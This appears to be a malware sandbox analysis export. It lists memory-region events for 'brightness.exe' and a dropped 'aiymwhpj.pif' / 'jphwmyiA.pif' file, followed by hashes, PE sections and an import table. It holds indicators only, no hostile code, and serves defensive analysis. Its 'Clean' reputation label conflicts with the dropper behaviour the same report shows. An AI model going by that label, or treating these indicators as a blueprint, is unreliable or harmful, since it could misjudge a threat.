buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x7F170000	0x7F28FFFF	Image In Buffer	32-bit	-	... Actions Go to Process Download Dump
brightness.exe	2	0x00400000	0x00523FFF	Final Dump	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x20E30000	0x20F6FFFF	Image In Buffer	32-bit	-	... Actions Go to Process Download Dump
brightness.exe	2	0x00400000	0x00523FFF	Process Termination	32-bit	-	... Actions Go to Process Download Dump
aiymwhpj.pif	8	0x00400000	0x00523FFF	Relevant Image	32-bit	0x004044E4	... Actions Go to Process Download Dump
buffer	8	0x00740000	0x00740FFF	First Execution	32-bit	0x00740FE2	... Actions Go to Process Download Dump
buffer	8	0x2069E6C8	0x2069EAAE	Marked Executable	32-bit	-	... Actions Go to Process Download Dump
buffer	8	0x027E2388	0x027FAA2A	Marked Executable	32-bit	-	... Actions Go to Process Download Dump
buffer	8	0x20698000	0x2069FFFF	First Network Behavior	32-bit	-	... Actions Go to Process Download Dump
buffer	8	0x0019C000	0x0019FFFF	First Network Behavior	32-bit	-	... Actions Go to Process Download Dump
buffer	8	0x00740000	0x00740FFF	First Network Behavior	32-bit	-	... Actions Go to Process Download Dump
buffer	8	0x02090000	0x021CFFFF	First Network Behavior	32-bit	-	... Actions Go to Process Download Dump
buffer	8	0x027E2388	0x027FAA2A	First Network Behavior	32-bit	-	... Actions Go to Process Download Dump
buffer	8	0x20460000	0x2059FFFF	First Network Behavior	32-bit	-	... Actions Go to Process Download Dump
buffer	8	0x2069E6C8	0x2069EAAE	First Network Behavior	32-bit	-	... Actions Go to Process Download Dump
buffer	8	0x207A0000	0x208DFFFF	First Network Behavior	32-bit	-	... Actions Go to Process Download Dump
buffer	8	0x7EF90000	0x7F1CFFFF	First Network Behavior	32-bit	-	... Actions Go to Process Download Dump
buffer	8	0x7F1D0000	0x7F25FFFF	First Network Behavior	32-bit	-	... Actions Go to Process Download Dump
buffer	8	0x7F380000	0x7F40FFFF	First Network Behavior	32-bit	-	... Actions Go to Process Download Dump
buffer	8	0x7F4D0000	0x7F55FFFF	First Network Behavior	32-bit	-	... Actions Go to Process Download Dump
buffer	8	0x7F560000	0x7F67FFFF	First Network Behavior	32-bit	-	... Actions Go to Process Download Dump
buffer	8	0x7F680000	0x7FAEFFFF	First Network Behavior	32-bit	-	... Actions Go to Process Download Dump
buffer	8	0x7FAF0000	0x7FC0FFFF	First Network Behavior	32-bit	-	... Actions Go to Process Download Dump
buffer	8	0x7FC10000	0x7FC8FFFF	First Network Behavior	32-bit	-	... Actions Go to Process Download Dump
buffer	8	0x7FC90000	0x7FCFFFFF	First Network Behavior	32-bit	-	... Actions Go to Process Download Dump
buffer	8	0x7FD00000	0x7FD8FFFF	First Network Behavior	32-bit	-	... Actions Go to Process Download Dump
buffer	8	0x7FD90000	0x7FE1FFFF	First Network Behavior	32-bit	-	... Actions Go to Process Download Dump
buffer	8	0x7FE20000	0x7FEAFFFF	First Network Behavior	32-bit	-	... Actions Go to Process Download Dump
aiymwhpj.pif	8	0x00400000	0x00523FFF	First Network Behavior	32-bit	-	... Actions Go to Process Download Dump
counters.dat	8	0x00830000	0x00830FFF	First Network Behavior	32-bit	-	... Actions Go to Process Download Dump
aiymwhpj.pif	8	0x00400000	0x00523FFF	Process Termination	32-bit	-	... Actions Go to Process Download Dump

C:\Users\Public\Libraries\jphwmyiA.pif

Dropped File

Binary

Also Known As	\??\C:\Users\Public\Libraries\jphwmyiA.pif (Dropped File, Accessed File)
MIME Type	application/vnd.microsoft.portable-executable
File Size	171.67 KB
MD5	22331abcc9472cc9dc6f37faf333aa2c
SHA1	2a001c30ba79a19ceaf6a09c3567c70311760aa4
SHA256	bdfa725ec2a2c8ea5861d9b4c2f608e631a183fca7916c1e07a28b656cc8ec0c
SSDeep	3072:qjyOm0e6/bIhbuwxlEb1MpG+xUEyAn0fYuDGOpPXFZ7on+gUxloDMq:qjyl6ebX45OG+xUEWfYUGOpPXFZ7on+G
ImpHash	4e8d60922911eb6e50d7b9d51afdc286

File Reputation Information

Verdict

Clean

PE Information

Image Base	0x00400000
Entry Point	0x00401000
Size Of Code	0x00021000
Size Of Initialized Data	0x00009000
File Type	IMAGE_FILE_EXECUTABLE_IMAGE
Subsystem	IMAGE_SUBSYSTEM_WINDOWS_CUI
Machine Type	IMAGE_FILE_MACHINE_I386
Compile Timestamp	2035-10-14 20:38 (UTC+2)

Sections (7)

Name	Virtual Address	Virtual Size	Raw Data Size	Raw Data Offset	Flags	Entropy
.text	0x00401000	0x00021000	0x00020A00	0x00000600	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ	6.5
.data	0x00422000	0x00009000	0x00005000	0x00021000	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE	5.35
.tls	0x0042B000	0x00001000	0x00000200	0x00026000	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE	0.0
.rdata	0x0042C000	0x00001000	0x00000200	0x00026200	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ	0.2
.idata	0x0042D000	0x00002000	0x00001800	0x00026400	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ	5.03
.edata	0x0042F000	0x00001000	0x00000200	0x00027C00	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ	2.69
.reloc	0x00430000	0x00002000	0x00001800	0x00027E00	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ	6.54

Imports (5)

KERNEL32.dll (87)

API Name	Ordinal	IAT Address	Thunk RVA	Thunk Offset	Hint
CloseHandle	-	0x0042D1D8	0x0002D078	0x00026478	0x00000000
CreateDirectoryA	-	0x0042D1DC	0x0002D07C	0x0002647C	0x00000000
CreateFileA	-	0x0042D1E0	0x0002D080	0x00026480	0x00000000
CreateFileW	-	0x0042D1E4	0x0002D084	0x00026484	0x00000000
DeleteFileA	-	0x0042D1E8	0x0002D088	0x00026488	0x00000000
DeleteFileW	-	0x0042D1EC	0x0002D08C	0x0002648C	0x00000000
EnterCriticalSection	-	0x0042D1F0	0x0002D090	0x00026490	0x00000000
ExitProcess	-	0x0042D1F4	0x0002D094	0x00026494	0x00000000
FileTimeToDosDateTime	-	0x0042D1F8	0x0002D098	0x00026498	0x00000000
FileTimeToLocalFileTime	-	0x0042D1FC	0x0002D09C	0x0002649C	0x00000000
FileTimeToSystemTime	-	0x0042D200	0x0002D0A0	0x000264A0	0x00000000
FindClose	-	0x0042D204	0x0002D0A4	0x000264A4	0x00000000
FindFirstFileA	-	0x0042D208	0x0002D0A8	0x000264A8	0x00000000
FindNextFileA	-	0x0042D20C	0x0002D0AC	0x000264AC	0x00000000
FindResourceA	-	0x0042D210	0x0002D0B0	0x000264B0	0x00000000
FormatMessageA	-	0x0042D214	0x0002D0B4	0x000264B4	0x00000000
FreeLibrary	-	0x0042D218	0x0002D0B8	0x000264B8	0x00000000
FreeResource	-	0x0042D21C	0x0002D0BC	0x000264BC	0x00000000
GetACP	-	0x0042D220	0x0002D0C0	0x000264C0	0x00000000
GetCPInfo	-	0x0042D224	0x0002D0C4	0x000264C4	0x00000000
GetCommandLineA	-	0x0042D228	0x0002D0C8	0x000264C8	0x00000000
GetCurrentDirectoryA	-	0x0042D22C	0x0002D0CC	0x000264CC	0x00000000
GetCurrentProcess	-	0x0042D230	0x0002D0D0	0x000264D0	0x00000000
GetCurrentProcessId	-	0x0042D234	0x0002D0D4	0x000264D4	0x00000000
GetCurrentThreadId	-	0x0042D238	0x0002D0D8	0x000264D8	0x00000000
GetDateFormatA	-	0x0042D23C	0x0002D0DC	0x000264DC	0x00000000
GetDiskFreeSpaceA	-	0x0042D240	0x0002D0E0	0x000264E0	0x00000000
GetDriveTypeA	-	0x0042D244	0x0002D0E4	0x000264E4	0x00000000
GetEnvironmentStrings	-	0x0042D248	0x0002D0E8	0x000264E8	0x00000000
GetEnvironmentVariableA	-	0x0042D24C	0x0002D0EC	0x000264EC	0x00000000
GetFileAttributesA	-	0x0042D250	0x0002D0F0	0x000264F0	0x00000000
GetFileAttributesW	-	0x0042D254	0x0002D0F4	0x000264F4	0x00000000
GetFileSize	-	0x0042D258	0x0002D0F8	0x000264F8	0x00000000
GetFileType	-	0x0042D25C	0x0002D0FC	0x000264FC	0x00000000
GetFullPathNameA	-	0x0042D260	0x0002D100	0x00026500	0x00000000
GetLastError	-	0x0042D264	0x0002D104	0x00026504	0x00000000
GetLocalTime	-	0x0042D268	0x0002D108	0x00026508	0x00000000
GetLogicalDrives	-	0x0042D26C	0x0002D10C	0x0002650C	0x00000000
GetModuleFileNameA	-	0x0042D270	0x0002D110	0x00026510	0x00000000
GetModuleHandleA	-	0x0042D274	0x0002D114	0x00026514	0x00000000
GetProcAddress	-	0x0042D278	0x0002D118	0x00026518	0x00000000
GetStartupInfoA	-	0x0042D27C	0x0002D11C	0x0002651C	0x00000000
GetStdHandle	-	0x0042D280	0x0002D120	0x00026520	0x00000000
GetStringTypeW	-	0x0042D284	0x0002D124	0x00026524	0x00000000
GetSystemDirectoryA	-	0x0042D288	0x0002D128	0x00026528	0x00000000
GetTickCount	-	0x0042D28C	0x0002D12C	0x0002652C	0x00000000
GetTimeZoneInformation	-	0x0042D290	0x0002D130	0x00026530	0x00000000
GetVersion	-	0x0042D294	0x0002D134	0x00026534	0x00000000
GetVersionExA	-	0x0042D298	0x0002D138	0x00026538	0x00000000
GetWindowsDirectoryA	-	0x0042D29C	0x0002D13C	0x0002653C	0x00000000
GlobalAlloc	-	0x0042D2A0	0x0002D140	0x00026540	0x00000000
GlobalLock	-	0x0042D2A4	0x0002D144	0x00026544	0x00000000
GlobalMemoryStatus	-	0x0042D2A8	0x0002D148	0x00026548	0x00000000
GlobalUnlock	-	0x0042D2AC	0x0002D14C	0x0002654C	0x00000000
InitializeCriticalSection	-	0x0042D2B0	0x0002D150	0x00026550	0x00000000
LeaveCriticalSection	-	0x0042D2B4	0x0002D154	0x00026554	0x00000000
LoadLibraryA	-	0x0042D2B8	0x0002D158	0x00026558	0x00000000
LoadResource	-	0x0042D2BC	0x0002D15C	0x0002655C	0x00000000
LocalAlloc	-	0x0042D2C0	0x0002D160	0x00026560	0x00000000
LocalFree	-	0x0042D2C4	0x0002D164	0x00026564	0x00000000
LockResource	-	0x0042D2C8	0x0002D168	0x00026568	0x00000000
MoveFileA	-	0x0042D2CC	0x0002D16C	0x0002656C	0x00000000
MultiByteToWideChar	-	0x0042D2D0	0x0002D170	0x00026570	0x00000000
RaiseException	-	0x0042D2D4	0x0002D174	0x00026574	0x00000000
ReadFile	-	0x0042D2D8	0x0002D178	0x00026578	0x00000000
RtlUnwind	-	0x0042D2DC	0x0002D17C	0x0002657C	0x00000000
SetConsoleCtrlHandler	-	0x0042D2E0	0x0002D180	0x00026580	0x00000000
SetCurrentDirectoryA	-	0x0042D2E4	0x0002D184	0x00026584	0x00000000
SetEnvironmentVariableA	-	0x0042D2E8	0x0002D188	0x00026588	0x00000000
SetFilePointer	-	0x0042D2EC	0x0002D18C	0x0002658C	0x00000000
SetHandleCount	-	0x0042D2F0	0x0002D190	0x00026590	0x00000000
Sleep	-	0x0042D2F4	0x0002D194	0x00026594	0x00000000
TlsAlloc	-	0x0042D2F8	0x0002D198	0x00026598	0x00000000
TlsFree	-	0x0042D2FC	0x0002D19C	0x0002659C	0x00000000
TlsGetValue	-	0x0042D300	0x0002D1A0	0x000265A0	0x00000000
TlsSetValue	-	0x0042D304	0x0002D1A4	0x000265A4	0x00000000
UnhandledExceptionFilter	-	0x0042D308	0x0002D1A8	0x000265A8	0x00000000
VirtualAlloc	-	0x0042D30C	0x0002D1AC	0x000265AC	0x00000000
VirtualFree	-	0x0042D310	0x0002D1B0	0x000265B0	0x00000000
VirtualQuery	-	0x0042D314	0x0002D1B4	0x000265B4	0x00000000
WideCharToMultiByte	-	0x0042D318	0x0002D1B8	0x000265B8	0x00000000
WinExec	-	0x0042D31C	0x0002D1BC	0x000265BC	0x00000000
WriteFile	-	0x0042D320	0x0002D1C0	0x000265C0	0x00000000
lstrcmpiA	-	0x0042D324	0x0002D1C4	0x000265C4	0x00000000
lstrcpyA	-	0x0042D328	0x0002D1C8	0x000265C8	0x00000000
lstrcpynA	-	0x0042D32C	0x0002D1CC	0x000265CC	0x00000000
lstrlenA	-	0x0042D330	0x0002D1D0	0x000265D0	0x00000000

COMDLG32.dll (2)

API Name	Ordinal	IAT Address	Thunk RVA	Thunk Offset	Hint
GetOpenFileNameA	-	0x0042D344	0x0002D338	0x00026738	0x00000000
GetSaveFileNameA	-	0x0042D348	0x0002D33C	0x0002673C	0x00000000

GDI32.dll (35)

API Name	Ordinal	IAT Address	Thunk RVA	Thunk Offset	Hint
BitBlt	-	0x0042D3E0	0x0002D350	0x00026750	0x00000000
CreateBitmap	-	0x0042D3E4	0x0002D354	0x00026754	0x00000000
CreateCompatibleBitmap	-	0x0042D3E8	0x0002D358	0x00026758	0x00000000
CreateCompatibleDC	-	0x0042D3EC	0x0002D35C	0x0002675C	0x00000000
CreateFontA	-	0x0042D3F0	0x0002D360	0x00026760	0x00000000
CreateFontIndirectA	-	0x0042D3F4	0x0002D364	0x00026764	0x00000000
CreatePen	-	0x0042D3F8	0x0002D368	0x00026768	0x00000000
CreateSolidBrush	-	0x0042D3FC	0x0002D36C	0x0002676C	0x00000000
DPtoLP	-	0x0042D400	0x0002D370	0x00026770	0x00000000
DeleteDC	-	0x0042D404	0x0002D374	0x00026774	0x00000000
DeleteObject	-	0x0042D408	0x0002D378	0x00026778	0x00000000
Ellipse	-	0x0042D40C	0x0002D37C	0x0002677C	0x00000000
ExtCreatePen	-	0x0042D410	0x0002D380	0x00026780	0x00000000
ExtTextOutA	-	0x0042D414	0x0002D384	0x00026784	0x00000000
GetDeviceCaps	-	0x0042D418	0x0002D388	0x00026788	0x00000000
GetNearestColor	-	0x0042D41C	0x0002D38C	0x0002678C	0x00000000
GetObjectA	-	0x0042D420	0x0002D390	0x00026790	0x00000000
GetPixel	-	0x0042D424	0x0002D394	0x00026794	0x00000000
GetStockObject	-	0x0042D428	0x0002D398	0x00026798	0x00000000
GetTextExtentPoint32A	-	0x0042D42C	0x0002D39C	0x0002679C	0x00000000
GetTextMetricsA	-	0x0042D430	0x0002D3A0	0x000267A0	0x00000000
IntersectClipRect	-	0x0042D434	0x0002D3A4	0x000267A4	0x00000000
LineTo	-	0x0042D438	0x0002D3A8	0x000267A8	0x00000000
MoveToEx	-	0x0042D43C	0x0002D3AC	0x000267AC	0x00000000
Rectangle	-	0x0042D440	0x0002D3B0	0x000267B0	0x00000000
SelectObject	-	0x0042D444	0x0002D3B4	0x000267B4	0x00000000
SetBkColor	-	0x0042D448	0x0002D3B8	0x000267B8	0x00000000
SetBkMode	-	0x0042D44C	0x0002D3BC	0x000267BC	0x00000000
SetPixel	-	0x0042D450	0x0002D3C0	0x000267C0	0x00000000
